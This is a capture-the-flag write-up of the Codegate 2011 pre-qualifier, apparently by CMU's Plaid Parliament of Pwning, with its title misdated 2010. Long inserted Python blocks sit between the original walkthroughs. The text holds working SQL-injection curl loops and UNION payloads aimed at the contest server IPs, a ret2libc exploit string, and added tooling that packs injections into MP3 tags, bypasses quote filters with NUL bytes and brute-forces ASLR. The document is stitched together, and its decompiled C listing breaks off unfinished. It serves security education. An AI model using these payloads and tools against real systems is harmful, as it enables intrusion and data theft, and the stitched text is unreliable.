Codegate 2010 Prequal - Problem Solution
Plaid Parliament of Pwning
- Security Research Group at CMU
March 9, 2011
1 Introduction
This is a report for the Codegate 2011 pre-qual from Plaid Parliament of Pwning (PPP), Carnegie
Mellon University's security group. It describes walk-throughs for all the challenges that we
completed during the competition. This report is also available at http://ppp.cylab.cmu.edu.
2 Walk-throughs
Vulnerability 100
Upon visiting the given link, we find that the site blocks Firefox and Chrome, for no apparent
reason. Changing our User-Agent to IE, we reach a login screen and sign up for an account.
Logging in, we see a music player application. After some failed attempts to upload and run a PHP
file, we try submitting an mp3 with single quotes in its ID3 tags. This results in an SQL error.
With some experimentation, we notice that the script joins the title, artist, album, year, and
comment fields together with slashes and inserts the resulting string into a table. Since it checks
that the year is numeric, we cannot use that field for the injection.
From here, we use SQL injection to dump the table names. This is slightly annoying, because
the application seems to limit most ID3 tags to 28 characters, and the output of the query is
also truncated before it is displayed.
    for i in {0..36}
    do
      lame sine.wav --tt "a',(select table_name /**" --ta " from /**" --tl " information_schema.tables /*" --ty "2011" --tc " a */ limit $i,1));#" sine.mp3
      curl -D - -b PHPSESSID=hqjcpvubtlptaeqbnqrbt7c643 http://221.141.3.110/__music/music_upload_ok.php -F 'myFile=@sine.mp3'
    done
We notice a table called vul100pwd. Using
    lame sine.wav --tt "a',(select column_name /**" --ta " from information_schema./**" --tl " columns where table_name=/*" --ty "2011" --tc " a */'vul100pwd' limit 0,1));#" sine.mp3
we find that it contains a column pwpw. Finally, we select the key from the table:
    lame sine.wav --tt "a',(select group_concat(/**" --ta " pwpw) from vul100pwd))#" --tl "x" --ty "x" --tc "x" sine.mp3
Key: hello, sonic!
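As an added example (not the writeup's code), the split that the shell loop above does by hand, generalised: a Python packer that spreads any injection over the ID3v1.1 title, artist, album and comment fields so that the server's slash joins land inside SQL comments, writes a real 128-byte ID3v1.1 trailer, parses it back the way a naive server-side tag reader would, and shows the query that results. The ID3v1.1 widths are the real format (title, artist and album 30 bytes, year 4, comment 28, which is the 28-character cap noted above). The INSERT statement, its table and column names, and the numeric year check are an assumed model of the challenge's script, and effective_sql only approximates MySQL's comment handling.

```python
import re

# ID3v1.1 field widths in bytes. The writeup's 28-character cap on most tags
# matches the ID3v1.1 comment field; title, artist and album are 30 bytes.
ID3V1_WIDTHS = {"title": 30, "artist": 30, "album": 30, "year": 4, "comment": 28}
ORDER = ("title", "artist", "album", "year", "comment")

# A field before the year ends with an open comment and the server's '/'
# closes it ('/**' + '/' = '/**/'). The album ends with '/*' so that
# '/2011/' is swallowed, and the comment field re-opens with '*/'.
SUFFIX = {"title": "/**", "artist": "/**", "album": "/*"}
PREFIX = {"comment": "*/"}


def pack_payload(sql, year="2011"):
    """Spread the whitespace-separated tokens of `sql` over the text fields so
    that no token is split and every field fits its ID3v1.1 width."""
    tokens = sql.split()
    fields = {"year": year}
    for name in ("title", "artist", "album", "comment"):
        parts = [PREFIX[name]] if name in PREFIX else []
        suffix = [SUFFIX[name]] if name in SUFFIX else []
        while tokens and len(" ".join(parts + [tokens[0]] + suffix)) <= ID3V1_WIDTHS[name]:
            parts.append(tokens.pop(0))
        fields[name] = " ".join(parts + suffix)
    if tokens:
        raise ValueError("payload does not fit the tag: %r left over" % tokens)
    return fields


def build_id3v1(fields, track=1, genre=255):
    """Serialise the fields as the 128-byte ID3v1.1 trailer of an MP3 file."""
    out = b"TAG"
    for name in ORDER:
        raw = fields[name].encode("latin-1")
        if len(raw) > ID3V1_WIDTHS[name]:
            raise ValueError("%s is %d bytes, max %d" % (name, len(raw), ID3V1_WIDTHS[name]))
        out += raw.ljust(ID3V1_WIDTHS[name], b"\x00")
    return out + b"\x00" + bytes([track, genre])


def parse_id3v1(tag):
    """Read the fields back the way a naive server-side tag reader would."""
    if len(tag) != 128 or tag[:3] != b"TAG":
        raise ValueError("not an ID3v1 tag")
    fields, pos = {}, 3
    for name in ORDER:
        width = ID3V1_WIDTHS[name]
        fields[name] = tag[pos:pos + width].split(b"\x00", 1)[0].decode("latin-1")
        pos += width
    return fields


def vulnerable_insert(filename, fields):
    """Assumed model of the challenge's query: the five values are joined with
    '/' and concatenated into a quoted literal, and the year must be numeric.
    Table and column names are invented for the model."""
    if not fields["year"].isdigit():
        raise ValueError("year must be numeric")
    info = "/".join(fields[name] for name in ORDER)
    return "INSERT INTO music (filename, info, uploaded) VALUES ('%s', '%s', NOW())" % (filename, info)


def effective_sql(query):
    """Approximate what MySQL parses: drop /* */ comments and everything after
    a '#', then collapse whitespace. Adequate for payloads whose '#' sits
    outside any string literal, as here."""
    query = re.sub(r"/\*.*?\*/", " ", query, flags=re.S)
    query = re.sub(r"#.*", "", query, flags=re.S)
    return " ".join(query.split())


def exploit_sql(sql, filename="sine.mp3"):
    """End to end: pack, write the tag, let the 'server' read it, show the query."""
    tag = build_id3v1(pack_payload(sql))
    return effective_sql(vulnerable_insert(filename, parse_id3v1(tag)))


if __name__ == "__main__":
    print(exploit_sql("a',(select group_concat(pwpw) from vul100pwd where pwpw like 'h%' limit 0,1));#"))
```

Packing fails with a ValueError when a single token is wider than the room left in any field; the writeup's column_name query is such a case, which is why it splits `information_schema./**/columns` across two fields by hand. That split works in MySQL but is not something the packer attempts.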
Vulnerability 200
We are given a website with a login prompt. After registering and logging in, we see a message-
board-like page. In the source of the page is a comment with the string hint 0, although it is not
immediately obvious what this means.
We notice that there is a trivial SQL injection vulnerability in view.php, but after dumping all
of the tables, we realize that the MySQL user the vulnerable query runs as does not have access
to some tables (such as the table with the auth credentials).
After the hint "Get Administrator account" was revealed, we found that we were able to log in
as Administrator using either the password "a" or "Administrator". When logged in as Administrator,
the comment on the main page contains hint 1 instead. At this point, we also notice that a cookie
named lang is set with the value English. Setting this cookie to "'" returns a page where the
comment contains an SQL error.
Now, we dump the table names with:
1
curl http ://221.141.3.112/ dashboard . php -b " PHPSESSID = k j e b s 3 2 v 0 b 9 4 m t v c k 5 h 1 e o i n q 3 ;
lang = ’ union select ( select group_concat ( table_name ) from i nf ormation_schema .
tables ) ,1#"
We then notice that the raw_data table has columns data_id and data_value and contains 101
rows of base64 strings. We dump them with:
    for i in {0..100}
    do
      curl http://221.141.3.112/dashboard.php -b "PHPSESSID=kjebs32v0b94mtvck5h1eoinq3; lang=' union select (select data_value from raw_data limit $i,1),1#" | grep hint | sed -e 's/.*hint//' -e 's/-->$//' > $i
    done
After base64 decoding each row, we find that row 20 contains a broken PNG image, unlike all
of the other rows, which contain random numbers. Looking at the data, we see that it contains the
string FLAG:391ce70ad3dba822611ce5a61eb7125e.
Key: 391ce70ad3dba822611ce5a61eb7125e
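The row dump and triage, as an added Python example that is not from the writeup: parse the value out of the hint comment the way the grep|sed pipeline did, base64-decode it, and flag the row whose content is not a digit string (recognised here by the PNG signature) before searching it for a FLAG: marker. The pages in SAMPLE_PAGES are constructed, and the flag they carry is a placeholder, not the challenge's.

```python
import base64
import re

HINT_RE = re.compile(r"<!--\s*hint\s*(.*?)\s*-->", re.S)
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
FLAG_RE = re.compile(rb"FLAG:([0-9a-f]{32})")


def parse_hint(html):
    """Pull the injected value out of the HTML comment, the way the grep|sed pair did."""
    m = HINT_RE.search(html)
    if not m:
        raise ValueError("no hint comment in page")
    return m.group(1)


def classify(blob):
    """Label a decoded row: the decoys were strings of digits, the odd row a PNG."""
    if blob.startswith(PNG_MAGIC):
        return "png"
    if blob.isdigit():
        return "digits"
    return "other"


def triage(pages):
    """Decode every dumped page; return (row, kind, flag-or-None) per row."""
    results = []
    for i, html in enumerate(pages):
        blob = base64.b64decode(parse_hint(html))
        m = FLAG_RE.search(blob)
        results.append((i, classify(blob), m.group(1).decode() if m else None))
    return results


def find_flag(pages):
    """First flag found in a row that is not a digit-string decoy."""
    for _, kind, flag in triage(pages):
        if kind != "digits" and flag:
            return flag
    return None


def _page(value):
    """Constructed dashboard.php response for one injected data_value."""
    return "<html><body>Dashboard<!-- hint %s --></body></html>" % base64.b64encode(value).decode()


# Constructed sample rows: three digit-string decoys and one broken PNG that
# carries a placeholder flag (not the challenge's).
SAMPLE_PAGES = [
    _page(b"48291034"),
    _page(b"77210455"),
    _page(PNG_MAGIC + b"\x00\x00\x00\rIHDR" + b"\x00" * 13
          + b"FLAG:0123456789abcdef0123456789abcdef" + b"IEND"),
    _page(b"1029384"),
]

if __name__ == "__main__":
    for row, kind, flag in triage(SAMPLE_PAGES):
        print(row, kind, flag)
```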
Vulnerability 300
This is your standard Linux binary pwnable: SSH in, exploit the setuid binary, and grab the key.
The binary had an obvious bug: a strncpy followed by a strncat. This allowed you to overwrite
the return address. However, the server was a recent version of Ubuntu, so the NX bit was enabled
and addresses were randomized.
Our solution to defeat address randomization was brute force. On 32-bit Linux, library
addresses only have 12 bits of randomization, so if you can run your exploit several thousand times,
probability says you will eventually guess right. Unfortunately, the creator decided to put a sleep
into the binary (probably to discourage brute force). This can be bypassed by simply running each
attempt in the background instead of waiting for each one to finish.
To defeat the NX bit we used the standard ret2libc method. Our specific target was execve. In
order to set up the arguments to execve, we used a stack pivot to point into the arguments of
the program. We pointed the first argument of execve to "s0m3b0dy:15n0b0dy", and the other
arguments to a null DWORD.
The exploit string then is:
/ home / vuln1 / vuln300 - us0m3b0dy - p15n0b0dy -x ‘ perl -e ’ print " A " x0x1fd ’ ‘ - fa -y ‘
perl -e ’ print " AAABB " ," CCCC " ,"\ x31 \ x56 \ xbd \ x00 " ’ ‘ ‘ perl -e ’ print "\ x64 \ x85 \
x04 \ x08 " x0x1000 ,"\ x10 \ x75 \ xb7 " ’ ‘ ‘ perl -e ’ print " DDDD " ,"\ x16 \ x8a \ x04 \ x08 \ x20 \
x9f \ x04 \ x08 \ x20 \ x9f \ x04 \ x08 " ’ ‘ ’A ’
Once we get a shell, we can then read /home/vuln1/flag.txt which gives us the key.
Key: 33f9876804c9a14e927e5d1d70a64ace
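The brute-force arithmetic and the run-in-the-background trick, as an added Python example rather than the writeup's own script: success_probability and attempts_for_confidence take the entropy in bits as a parameter (the writeup's figure for 32-bit library bases is 12), and brute_force keeps many runs in flight so that a sleep inside the target costs wall-clock time once per batch rather than once per run. make_target is a constructed stand-in for the setuid binary; against the real thing, attempt() would spawn the binary with the fixed payload and report whether a shell came back.

```python
import math
import random
import threading
import time
from concurrent.futures import ThreadPoolExecutor


def success_probability(bits, attempts):
    """P(at least one hit) for a target with `bits` bits of entropy that is
    re-randomised on every run and attacked with one fixed guess."""
    return 1.0 - (1.0 - 2.0 ** -bits) ** attempts


def attempts_for_confidence(bits, confidence):
    """Smallest number of runs that hits with probability >= confidence."""
    return math.ceil(math.log(1.0 - confidence) / math.log(1.0 - 2.0 ** -bits))


def brute_force(attempt, max_attempts, workers=64):
    """Launch `attempt()` up to max_attempts times, `workers` runs in flight at
    once, and return the 1-based index of the first run that succeeded (None if
    none did). Every run sends the same guessed address; it is the target's
    own randomisation that changes between runs. Keeping many runs in flight
    is what makes a sleep() inside the target affordable."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        for start in range(0, max_attempts, workers):
            batch = range(start, min(start + workers, max_attempts))
            for i, ok in zip(batch, pool.map(lambda _: attempt(), batch)):
                if ok:
                    return i + 1
    return None


def make_target(bits, seed=0, delay=0.0):
    """Constructed stand-in for the setuid binary: each run picks a fresh
    `bits`-bit library base, and the exploit lands only when it equals the
    value hard-coded in the payload (0 here), optionally after a sleep like
    the real binary's."""
    rng = random.Random(seed)
    lock = threading.Lock()

    def attempt():
        with lock:
            base = rng.getrandbits(bits)
        if delay:
            time.sleep(delay)
        return base == 0
    return attempt


if __name__ == "__main__":
    print("12-bit ASLR: %d runs for a 50%% chance, %d for 99%%"
          % (attempts_for_confidence(12, 0.5), attempts_for_confidence(12, 0.99)))
    hit = brute_force(make_target(12, seed=7, delay=0.01), max_attempts=20000, workers=256)
    print("simulated target fell on run %s" % hit)
```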
Vulnerability 400
Another SQL injection challenge. This time the target is a message board site which contains a
protected post. In order to read the post, we need to figure out its password.
If you attempt a standard SQL injection, you are told that you can't use a single quote (') in
the query string. This means that they are searching for the single quote character in the query
variable.
A possible way to bypass the filtering is to embed null bytes in the query and POST variables.
OWASP has a great example of this: http://www.owasp.org/index.php/Embedding_Null_Code.
So, let's try adding %00%27 to the end of a query variable. We don't get the error about a single
quote.
Now, let's try this on an exploitable query variable. We used the search variable since it is
probably a simple query. Note that we had to brute-force the number of columns in the rows.
    http://221.141.3.111/__board/board.php?order=subject&search=test%00%27 UNION SELECT 'a','b','c','d','e','f','g','h','i','j','k' %23
This produces a single result with the subject ’c’. It is now trivial to make this return the tables
and columns in the database.
    http://221.141.3.111/__board/board.php?order=subject&search=test%00%27 UNION SELECT 'a','b',(SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES),'d','e','f','g','h','i','j','k' %23
    http://221.141.3.111/__board/board.php?order=subject&search=test%00%27 UNION SELECT 'a','b',(SELECT GROUP_CONCAT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='sonic_board'),'d','e','f','g','h','i','j','k' %23
Clearly, the column we are looking for is pass. Alternatively, we could just print the content.
    http://221.141.3.111/__board/board.php?order=subject&search=test%00%27 UNION SELECT 'a','b',(SELECT pass FROM sonic_board LIMIT 1),'d','e','f','g','h','i','j','k' %23
The password is:
sonic!%#$**()%#_?qwerasdfzxcv{}
The content is:
Wow! Congratulation!
Password is : HackingForCola
Key: HackingForCola
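A runnable model of the bypass and the column-count search, added here and not part of the writeup: the quote check is modelled as a C-string style comparison that stops at the first NUL (an assumption consistent with the OWASP page cited), the board lives in an in-memory sqlite3 database whose rows are constructed, and the handler's query shape is invented. Two deliberate substitutions for sqlite: '-- ' ends the query instead of MySQL's # (%23), and sqlite_master stands in for INFORMATION_SCHEMA.

```python
import sqlite3

QUOTE_ERROR = "You can't use a single quote (') in the query string"


def filter_search(value):
    """Model of the challenge's check (assumed): it looks for a quote but sees
    the value the way a C-string function does, so inspection stops at the
    first NUL byte. That is the behaviour the OWASP Embedding Null Code page describes."""
    if "'" in value.split("\x00", 1)[0]:
        raise ValueError(QUOTE_ERROR)
    return value


def make_board():
    """Constructed stand-in for the board database. The protected post's
    password is the one the writeup recovered; everything else is invented."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE sonic_board (id INTEGER, subject TEXT, body TEXT, writer TEXT, pass TEXT)")
    db.executemany("INSERT INTO sonic_board VALUES (?, ?, ?, ?, ?)", [
        (1, "hello", "first post", "sonic", ""),
        (2, "secret", "Wow! Congratulation!", "admin", "sonic!%#$**()%#_?qwerasdfzxcv{}"),
    ])
    return db


def board_search(db, search):
    """Vulnerable handler (assumed query shape): the filtered value is pasted
    into the SQL. MySQL accepts the NUL inside the literal; python's sqlite3
    binding refuses embedded NULs, so the model drops it before executing."""
    filter_search(search)
    query = ("SELECT id, writer, subject FROM sonic_board WHERE subject LIKE '%"
             + search + "%' ORDER BY subject")
    return db.execute(query.replace("\x00", "")).fetchall()


def letters(n):
    """'a', 'b', 'c', ... as quoted SQL literals, one per probed column."""
    return ["'%s'" % chr(ord("a") + i) for i in range(n)]


def union_payload(columns):
    """The search= value: the NUL hides the quote from the filter and '-- '
    discards the rest of the original query (the writeup used %23, MySQL's '#')."""
    return "test\x00' UNION SELECT " + ", ".join(columns) + " -- "


def find_column_count(db, limit=32):
    """Grow the UNION SELECT until the database stops rejecting the column count."""
    for n in range(1, limit + 1):
        try:
            board_search(db, union_payload(letters(n)))
            return n
        except sqlite3.OperationalError:
            continue
    raise RuntimeError("no column count up to %d worked" % limit)


def display_position(db, n):
    """Which of the n columns lands in the rendered subject field (the writeup saw 'c')."""
    rows = board_search(db, union_payload(letters(n)))
    shown = rows[0][2]            # the model's page renders the third selected column
    return ord(shown) - ord("a")


def extract(db, expression, n, position):
    """Put `expression` in the displayed column and read the result back."""
    columns = letters(n)
    columns[position] = expression
    return board_search(db, union_payload(columns))[0][2]


if __name__ == "__main__":
    db = make_board()
    n = find_column_count(db)
    pos = display_position(db, n)
    print(n, "columns; the subject field shows column", pos)
    print(extract(db, "(SELECT group_concat(name) FROM sqlite_master)", n, pos))
    print(extract(db, "(SELECT pass FROM sonic_board WHERE pass <> '' LIMIT 1)", n, pos))
```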
Binary 100
We are given a file that contains what seems to be gibberish. Since file cannot identify the
file type, we did a Google Code search for the first four characters, #@~^, and find that it is a
file encoded with Microsoft's Script Encoder utility. We decode this using the utility at
http://www.virtualconspiracy.com/index.php?page=scrdec/intro, and find that the "binary" is
obfuscated JavaScript code.
Placing this code into an HTML file and running it, using Firebug to list the variables, shows that
there is a variable CodeGate JavaScriptEncode Key with value 120a151156120a163t111163120lea163u162e!.
Key: 120a151156120a163t111163120lea163u162e!
Binary 200
Reverse me!!
The first real binary challenge is a Windows exe file. However, when we try to run it, it appears
to do nothing.
So, we open it in IDA to see what is going on. There is a lot of stuff in the program, but
immediately a function catches our eye: sub_401130 moves lots of bytes onto the stack, a sure
sign of somebody trying to hide a string. And at the end, it calls printf with %s as the
format string. This function probably generates the key.
Further investigation of the function shows that it only calls one other function, sub_401070,
which doesn't call any other functions, and it doesn't use many global variables. This makes it
a perfect function to just decompile into C and run. The C code and its output are below.
[1] http://forensic-proof.com/archives/552

Listing 1: Output
    char unk_409610[260];
    short word_409714 = 0;

    char *sub_401070(int a1)
    {
        char *result;
        char *v2;
        int v3;

        v3 = a1;
        v2 = unk_409610;
        while (*(unsigned char *)v3)
        {
            *(unsigned char *)v2 = word_409714 ^ *(unsigned char *)v3;
            v2 = (char *)v2 + 1;
            ++v3;
        }
        result = v2;
        *(unsigned char *)v2 = 0;
        return result;
    }

    int main()
    {
        int v0;
        char *v2;
        char v3;
        char v4;
        char v5;
        char v6;
        char v7;
        char v8;
        char v9;
        char v10;
        char v11;
        char v12;
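The stack-string reconstruction described above, as an added Python example (not the writeup's code): parse IDA-style `mov [ebp+var_N], imm` stores, rebuild the buffer in address order, and run a port of sub_401070 over it. The sample listing is constructed, not the challenge's; the port assumes that only the low byte of the key word matters, which is what the byte store in the decompiled C implies, and the parser recognises only the `var_N` form of stack operands with an explicit size keyword.

```python
import re

# One IDA line per stack store, e.g. "mov byte ptr [ebp+var_104], 48h" or
# "mov word ptr [ebp+var_F8], 6F57h". var_N means ebp-N (N in hex).
STORE_RE = re.compile(
    r"mov\s+(?:(byte|word|dword)\s+ptr\s+)?\[ebp\+var_([0-9A-Fa-f]+)\]\s*,\s*([0-9A-Fa-f]+h?)",
    re.I)
# IDA omits the size keyword when the stack variable is typed; such stores are
# taken as bytes here (assumption), adjust to match the listing at hand.
SIZES = {"byte": 1, "word": 2, "dword": 4, None: 1}


def ida_int(text):
    """IDA prints immediates as decimal ('7') or hex with a trailing h ('0Ah')."""
    return int(text[:-1], 16) if text[-1] in "hH" else int(text,10)


def stack_string(disasm):
    """Rebuild the buffer that a run of mov [ebp+var_N], imm stores assembles."""
    stores = []
    for line in disasm.splitlines():
        m = STORE_RE.search(line)
        if not m:
            continue
        size = SIZES[m.group(1).lower() if m.group(1) else None]
        offset = -int(m.group(2), 16)
        stores.append((offset, ida_int(m.group(3)).to_bytes(size, "little")))
    if not stores:
        return b""
    base = min(off for off, _ in stores)
    buf = bytearray(max(off + len(v) for off, v in stores) - base)
    for off, value in stores:           # later stores overwrite earlier ones
        buf[off - base:off - base + len(value)] = value
    return bytes(buf)


def sub_401070(data, key=0):
    """Python port of the decompiled routine: XOR each byte with the global
    word until a NUL. The binary's key word is 0, so it is a plain copy."""
    out = bytearray()
    for b in data:
        if b == 0:
            break
        out.append((key ^ b) & 0xFF)
    return bytes(out)


# Constructed sample disassembly (not the challenge's own): the stores spell
# "Key?" followed by the terminating NUL.
SAMPLE_DISASM = """
.text:00401130 push    ebp
.text:00401131 mov     ebp, esp
.text:00401133 mov     byte ptr [ebp+var_10], 4Bh
.text:00401137 mov     byte ptr [ebp+var_F], 65h
.text:0040113B mov     word ptr [ebp+var_E], 3F79h
.text:00401141 mov     byte ptr [ebp+var_C], 0
"""

if __name__ == "__main__":
    buf = stack_string(SAMPLE_DISASM)
    print(buf, sub_401070(buf))
```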